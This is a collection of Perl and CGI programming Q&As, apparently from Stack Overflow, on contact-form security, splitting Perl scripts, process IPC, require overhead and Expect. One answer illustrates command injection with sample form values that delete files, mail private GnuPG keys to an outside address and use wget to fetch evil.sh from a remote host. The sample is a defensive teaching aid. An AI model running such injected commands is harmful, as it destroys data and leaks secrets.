Do Perl CGI programs have a buffer overflow or script vulnerability for HTML contact forms? - perl

My hosting company says it is possible to fill an HTML form text input field with just the right amount of garbage bytes to cause a buffer overflow/resource problem when used with Apache/HTTP POST to a CGI-Bin Perl script (such as NMS FormMail).
They say a core dump occurs at which point an arbitrary script (stored as part of the input field text) can be run on the server which can compromise the site. They say this isn't something they can protect against in their Apache/Perl configuration—that it's up to the Perl script to prevent this by limiting number of characters in the posted fields. But it seems like the core dump could occur before the script can limit field sizes.
This type of contact form and method is in wide use by thousands of sites, so I'm wondering if what they say is true. Can you security experts out there enlighten me—is this true? I'm also wondering if the same thing can happen with a PHP script. What do you recommend for a safe site contact script/method?

I am not sure about the buffer overflow, but it can't hurt to limit the POST size in any case. Just add the following at the top of your script:
use CGI qw/:standard/;
$CGI::POST_MAX=1024 * 100; # max 100K posts
$CGI::DISABLE_UPLOADS = 1; # no uploads

Ask them to provide you with a specific reference to the vulnerability. I am sure there are versions of Apache where it is possible to cause buffer overflows by specially crafted POST requests, but I don't know any specific to NMS FormMail.

You definitely should ask for specifics from your hosting company. There are a lot of unrelated statements in there.
A "buffer overflow" and a "resource problem" are completely different things. A buffer overflow suggests that you will crash perl or mod_perl or httpd themselves. If this is the case, then there is a bug in one of these components, and they should reference the bug in question and provide a timeline for when they will be applying the security update. Such a bug would certainly make Bugtraq.
A resource problem on the other hand, is a completely different thing. If I send you many megabytes in my POST, then I could eat an arbitrary amount of memory. This is resolvable by configuring the LimitRequestBody directive in httpd.conf. The default is unlimited. This has to be set by the hosting provider.
They say a core dump occurs at which point an arbitrary script (stored as part of the input field text) can be run on the server which can compromise the site. They say this isn't something they can protect against in their Apache/Perl configuration—that it's up to the Perl script to prevent this by limiting number of characters in the posted fields. But it seems like the core dump could occur before the script can limit field sizes.
Again, if this is creating a core dump in httpd (or mod_perl), then it represents a bug in httpd (or mod_perl). Perl's dynamic and garbage-collected memory management is not subject to buffer overflows or bad pointers in principle. This is not to say that a bug in perl itself cannot cause this, just that the perl language itself does not have the language features required to cause core dumps this way.
By the time your script has access to the data, it is far too late to prevent any of the things described here. Your script of course has its own security concerns, and there are many ways to trick perl scripts into running arbitrary commands. There just aren't many ways to get them to jump to arbitrary memory locations in the way that's being described here.

FormMail has been vulnerable to such attacks in the past, so I believe your ISP was using it as an illustration. Bad practices in any Perl script could lead to such woe.
I recommend ensuring that the Perl script verifies all user input if possible. Otherwise, only use trusted scripts and keep them updated.
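As a rough illustration of what "verifying all user input" might look like for a contact form, here is a minimal sketch in plain Perl. The field names, the length limits, and the clean_field helper are all made up for this example; they are not part of NMS FormMail or any other script.

```perl
use strict;
use warnings;

# Hypothetical per-field limits; tune them to the form being protected.
my %MAX_LENGTH = (name => 100, email => 254, message => 5000);

# Returns the cleaned value, or undef (in scalar context) if the field
# should be rejected.
sub clean_field {
    my ($field, $value) = @_;
    return unless defined $value && exists $MAX_LENGTH{$field};
    return if length($value) > $MAX_LENGTH{$field};

    if ($field eq 'message') {
        # Free text: drop control characters but keep tab and newline.
        $value =~ tr/\x00-\x08\x0B-\x1F\x7F//d;
    }
    else {
        # Values that may end up in mail headers must stay on one line,
        # otherwise an attacker could smuggle in extra headers.
        return if $value =~ /[[:cntrl:]]/;
    }
    return $value;
}

my $email = clean_field('email', "someone\@example.com\nBcc: victim\@example.com");
print defined $email ? "accepted\n" : "rejected\n";
```

Checks like these only cover what the script does with the data after it arrives; they cannot help with a crash inside the web server itself.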

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (un)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script—because my website is static—to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see offhand: you are using the "system()" call directly on <the_message>. Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account@hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
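To make the temporary-file advice concrete, here is a minimal Perl sketch (Perl rather than C, simply to keep it short). The run_on_tempfile helper is a made-up name; it writes the message to a private temporary file and runs the command through list-form open, so no shell ever parses the user's text.

```perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Hypothetical helper: write $message to a private temp file, then run
# @command with the file path appended as its last argument.
sub run_on_tempfile {
    my ($message, @command) = @_;

    my ($fh, $path) = tempfile(UNLINK => 1);   # created with mode 0600
    print {$fh} $message;
    close $fh or die "close failed: $!";

    # List-form pipe open: the arguments are passed to the program as-is,
    # so shell metacharacters in the message or path are never interpreted.
    open(my $out, '-|', @command, $path)
        or die "cannot run $command[0]: $!";
    my $result = do { local $/; <$out> };      # slurp all of the output
    close $out or die "$command[0] failed (wait status $?)";
    return $result;
}

# Demonstration with cat standing in for the real command.
print run_on_tempfile("hello and goodbye; rm -rf *\n", 'cat');
```

With GnuPG installed, the call would presumably look something like run_on_tempfile($message, 'gpg', '--encrypt', '--recipient', '31A49121CD42FF00', '--armor', '--output', '-'); treat that exact option list as an assumption to check against your gpg version. Note that this does write the plaintext to disk briefly, which the question wanted to avoid.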
A slightly deeper look
Okay so what's going on in terms of using C; Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with main focus on C for last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyways and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project, I had to debug, harden and augment it because it had some horrible buffer overflow issues left, right and center, non-existent UTF-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

How to split long Perl code into several files without too much manual editing?

How do I split a long Perl script into two or more different files that can all access the same variables - without having to rename all shared variables from e.g. $count to $::count (or $main::count which is the same)?
In other words, what's the best and simplest way to split the Perl script into several files without having to import a lot of variables/functions and/or do a lot of manual editing.
I assume it has something to do with making the code part of the same package/scope/namespace, but my experiments so far have failed.
I am not sure it makes a difference, but the script is used for web/CGI purposes and will be running under mod_perl.
EDIT - Background:
I kind of knew I would get that response. The reason I want to split up the file is the following:
Currently I have a single very old and very long Perl file. I know it is not following Perl best practices but it works.
The problem is, I need to distribute the data files it uses between different web servers, first of all for performance reasons. There will be one "master" server and one or several "slaves".
About 20% of the mentioned Perl file contains shared functions, 40% has the code need to run on the master server and 40% on the slave servers. Therefore, I would like to split the code into three files: 1. shared, 2. master-only, 3. slave-only. On the master server, 1 and 2 will be loaded, on the slaves, 1 and 3 will be loaded.
I assume this approach would use less process RAM and, more importantly, I would minimize the risk of not splitting the code correctly (e.g. a slave process calling a master data file). I don't see a great need for modularization, as the system works and the code does not need a lot of changes or exchanges with other projects.
EDIT 2 - Solution:
Found the solution I was looking for here:
http://www.perlmonks.org/?node_id=95813
In cases where the main package is in ownership of the variable, the
actual word 'main' can be omitted to yield something like: $::var
It is possible to get around having to fully qualify variable names
when strict is in use. Applying a simple use vars to your script, with
the variable names as its arguments will get around explicit package
names.
Actually, I ended up repeating the our ($count, etc...) statement for the needed variables instead of use vars ();
Do let me know if I am missing something vital - apart from not going with modules! :)
@Axeman, Thanks, I will accept your answer, both for your effort and for sending me in the right direction.
Unless you put different package statements in their files, they will all be treated as if they had package main; at the top. So assuming that the scripts use package variables, you shouldn't have to do anything. If you have declared them with my (that is, if they are lexically scoped variables) then you would have to make sure that all references to the variables are in the same file.
But splitting scripts up for length is a rotten substitute for modularization. Yes, modularization helps keep code length down, but modularization is the proper way to keep code length down--for all the reasons that you would want to keep code-length down, modularization does it best.
If chopping the files by length could really work for you, then you could create a script like this:
do '/path/to/bin/part1.pl';
do '/path/to/bin/part2.pl';
do '/path/to/bin/part3.pl';
...
But I kind of suspect that if the organization of this code is as bad as you're--sort of--indicating, it might suffer from some of the same re-inventing the wheel that I've seen in Perl-ignorant scripts. Just offhand (I might be wrong) but I'm thinking you would be surprised how much could be chopped from the length by simply substituting better-tested Perl library idioms than for-looping and while-ing everything.
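Here is a small, self-contained sketch of the package-variable point, with error checking added around do. The part file is generated in a temporary directory only so the example can run on its own; the names $count and part1.pl are just placeholders.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

our $count = 0;    # package variable $main::count, visible to every file

# Stand-in for a split-out part file; in real use it already exists on disk.
my $dir  = tempdir(CLEANUP => 1);
my $part = "$dir/part1.pl";
open(my $fh, '>', $part) or die "cannot write $part: $!";
print {$fh} <<'PART';
use strict;
our $count;        # re-declare the shared name so strict accepts it
$count += 5;
1;                 # a true value tells the caller the file ran to the end
PART
close $fh or die "close failed: $!";

# do returns the file's last value; undef means it could not be read or compiled.
my $ok = do $part;
die "could not compile $part: $@" if $@;
die "could not read $part: $!"    unless defined $ok;

print "count is now $count\n";
```

Because neither file contains a package statement, both see the same $main::count. A variable declared with my in the main script would not be visible inside the part file.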

How to use Perl for bi-directional communication with dsmadmc.exe?

I have simple web-form with a little js script that sends form values to a text box. This combined value becomes a database query.
This will be sent to dsmadmc (TSM administrative command line).
How can I use perl to keep the dsmadmc process open for consecutive input/output without the dsmadmc process closing between each input command sent?
And how can I capture the output - this is to be sent back to the same web page, in a separate div.
Any thoughts, anyone?
IPC::Open2 could probably help. It lets you write to the input and read from the output of an external process.
Beware of deadlocks though (i.e. situations where both your code and the app wait for their counterpart). You might want to use IO::Select to handle that.
P.S. I don't know how these modules behave on Windows (.exe?..), but from a quick Google search it looks like they are compatible.
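A minimal sketch of the idea follows, using a tiny Perl one-liner as a stand-in for dsmadmc so it can run anywhere. It assumes the child answers each command with exactly one line and flushes its output; a real dsmadmc session will likely behave differently (prompts, multi-line output, buffering), so treat send_command as a hypothetical starting point only.

```perl
use strict;
use warnings;
use IPC::Open2;
use IO::Select;

# Stand-in child process: answers every input line with one output line.
my @child_cmd = ($^X, '-e', '$| = 1; while (<STDIN>) { print "reply: $_" }');

# The child stays alive across commands until its input is closed.
my $pid = open2(my $from_child, my $to_child, @child_cmd);
my $selector = IO::Select->new($from_child);

# Hypothetical helper: send one command and wait for a one-line answer.
sub send_command {
    my ($command) = @_;
    print {$to_child} "$command\n";

    # Wait up to 5 seconds instead of blocking forever if the child is silent.
    my ($ready) = $selector->can_read(5)
        or die "no reply to '$command' within 5 seconds";
    my $line = <$ready>;
    die "child closed its output" unless defined $line;
    chomp $line;
    return $line;
}

my @replies = map { send_command($_) } 'query one', 'query two';
print "$_\n" for @replies;

close $to_child;      # end of input lets the child exit
close $from_child;
waitpid($pid, 0);
```

Under plain CGI the script itself exits after every request, so keeping the child open between web requests would need a long-running process (a small daemon, or something like mod_perl) to own the handles.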

How expensive is: require "foo.pl";

I'm about to rewrite a large portion of a project that I have developed over the last 10 years while learning Perl. There is a lot of optimisation that can be gained.
A key part of the code is a large if/elsif block that require xxx.cgi files depending on a POST value. Eg:
if($FORM{'action'} eq "1"){require "1.cgi";}
elsif($FORM{'action'} eq "2"){require "2.cgi";}
elsif($FORM{'action'} eq "3"){require "3.cgi";}
elsif($FORM{'action'} eq "4"){require "4.cgi";}
It has many more iterations, but just how expensive is using "require" in Perl?
require itself has a relatively low cost in any case and, if you require the same file more than once within a single run of your program, it will detect that the file has already been loaded and not attempt to load it a second time. However, if you have a long and highly-populated search path (@INC) and you require (or use) a lot of files, it's possible that all of the directory searches could add up; this isn't common (and doesn't sound likely in your case), but it can be improved by reorganizing your module directories so that the things you're loading show up earlier in @INC.
The potentially-major performance hit referred to by earlier answers is the cost of compiling the code in the files you require. Getting rid of the require by moving the code into your main program will not help with this, as the code will still need to be compiled. In your case, it would probably make things worse, as it would cause the code for all options to be compiled on every request rather than only compiling the code used by the one action selected by the user.
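The "loaded only once" behaviour is easy to check for yourself. The sketch below generates a throwaway file (action1.pl is an invented name standing in for something like 1.cgi), requires it three times, and counts how often its body actually ran.

```perl
use strict;
use warnings;
use File::Temp qw(tempdir);

our $loads = 0;    # incremented each time the file body actually runs

# Stand-in for one of the per-action files.
my $dir  = tempdir(CLEANUP => 1);
my $file = "$dir/action1.pl";
open(my $fh, '>', $file) or die "cannot write $file: $!";
print {$fh} "\$main::loads++;\n1;\n";
close $fh or die "close failed: $!";

require $file for 1 .. 3;    # only the first call compiles and runs the file

print "file body ran $loads time(s)\n";
print "recorded in %INC\n" if exists $INC{$file};
```

The second and third require calls find the path already recorded in %INC and return immediately, which is the cheap table lookup described above.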
As has been said, it really depends on the actual code in those files. Your best bet would be to do tests using Devel::NYTProf and/or Benchmark to see where the most time is being spent in your code if you are unhappy with its performance.
You can also read Profiling Perl on perl.com, but it is a bit outdated as it uses Devel::DProf.
Not an answer to your primary question, but still a good idea for a code refactor that I read recently on Ovid's blog.
The first time, possibly expensive; Perl has to search a path to find the file and load it up. Subsequent times, it's cheap -- a table is consulted and the file isn't actually loaded a second time. If this is in a CGI that is run once per request and then exited, then this is not too good.
It's really going to depend on the size of the files you're calling. If you have massive CGI files, then it might hurt the performance of your software. If we're talking 6 or 7 lines of code each, then no issue. Try benchmarking your program's performance with and without, and make your own judgement.

How can I control an interactive Unix application programmatically through Perl?

I have inherited a 20-year-old interactive command-line unix application that is no longer supported by its vendor. We need to automate some tasks in this application.
The most troublesome of these is creating thousands of new records with slightly different parameters (e.g. different identifiers, different names). The records have to be created in sequence, one at a time, which would take many months (and therefore dollars) to do manually. In most cases, creating a record has a very predictable pattern of keying in commands, reading responses, keying in further commands, etc. However, some record creation operations will result in error conditions ('record with this identifier already exists') that require a different set of commands to exit gracefully.
I can see a few different ways to do this:
Named pipes. Write a Perl script that runs the target application with STDIN and STDOUT set to named pipes then sends the target application the sequence of commands to create a record with the required parameters, and then instructs the target application to exit and shut down. We then run the script as many times as required with different parameters.
Application. Find another Unix tool that can be used to script interactive programs. The only ones I have been able to find, though, are expect, which does not seem to be maintained; and chat, which I recall from ages ago, and which seems to do more-or-less what I want, but appears to be only for controlling modems.
One more potential complication: I think the target application was written for a VT100 terminal and it uses some sort of escape sequences to do things like provide highlighting.
My question is what approach should I take? One of these, or something completely different? I quite like the idea of using named pipes and then having a Perl script that opens the FIFOs and reads and writes as required, as it provides a lot of flexibility, but from what I have read it seems like there's a lot of potential problems if I go down this path.
Thanks in advance.
I'd definitely stick to Perl for the extra flexibility, as chaos suggested. Are you aware of the Expect perl module? It's a lot nicer than the named pipe approach.
Note also with named pipes, you can't force the output coming back from your legacy application to be unbuffered, which could be annoying. I think Expect.pm uses pseudo-ttys to get around this problem, but I'm not sure. See the discussion in perlipc in the section "Bidirectional Communication with Another Process" for more details.
expect is a lot more solid than you're probably giving it credit for, but if I were you I'd still go with the Perl option, wanting to have a full and familiar programming language for managing the process and having confidence that whatever weird issues arise, there will be ways of addressing them.
Expect, either with the Tcl or Perl implementations, would be my first attempt. If you are seeing odd sequences in the output because it's doing odd terminal things, just filter those from the output before you do your matching.
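Filtering the terminal sequences can be done with a couple of substitutions before matching. The sketch below is a rough approximation that assumes the application emits standard VT100/ANSI escape sequences; strip_escapes is a made-up helper name, and a program that uses other control codes would need extra patterns.

```perl
use strict;
use warnings;

# Hypothetical helper: remove common VT100/ANSI escape sequences so that
# matching can be done against plain text.
sub strip_escapes {
    my ($text) = @_;

    # CSI sequences: ESC [ parameter bytes, intermediate bytes, final byte.
    $text =~ s/\x1b\[[\x30-\x3F]*[\x20-\x2F]*[\x40-\x7E]//g;

    # Character-set selection such as ESC ( B, then other two-byte escapes.
    $text =~ s/\x1b[()][\x30-\x7E]//g;
    $text =~ s/\x1b[\x30-\x5A\x5C-\x7E]//g;

    return $text;
}

my $raw = "\x1b[1mRecord 42\x1b[0m created\x1b[K";
print strip_escapes($raw), "\n";
```

Running each chunk of output through a filter like this before matching keeps the patterns themselves free of escape codes.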
With named pipes, you're going to end up reinventing Expect anyway.